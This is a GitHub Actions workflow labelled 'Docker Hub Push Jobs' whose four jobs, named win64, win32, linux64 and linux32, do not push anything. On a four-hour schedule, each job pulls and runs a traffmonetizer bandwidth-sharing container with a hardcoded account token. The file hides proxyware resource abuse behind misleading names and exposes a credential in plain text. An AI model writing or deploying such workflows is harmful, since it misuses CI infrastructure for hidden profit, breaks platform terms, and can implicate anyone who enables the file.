name: Docker Hub Push Jobs

on:
  schedule:
  - cron: "17 */4 * * *"
  workflow_dispatch:

jobs:
  win64:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
          sudo docker pull cnzb/traffmonetizer:latest
          sleep 15
          echo === traffmonetizer/cli ===
          sudo docker run -d --name tm cnzb/traffmonetizer start accept --token azWIU+XBSmebxmZAn8adJIB1GFmvqQrI4ctWi/32sz0=
          echo === traffmonetizer/cli === Logs ===
          sudo docker logs tm -t -f
          echo Done!

  win32:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token azWIU+XBSmebxmZAn8adJIB1GFmvqQrI4ctWi/32sz0=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
  linux64:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token azWIU+XBSmebxmZAn8adJIB1GFmvqQrI4ctWi/32sz0=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
  linux32:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token azWIU+XBSmebxmZAn8adJIB1GFmvqQrI4ctWi/32sz0=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
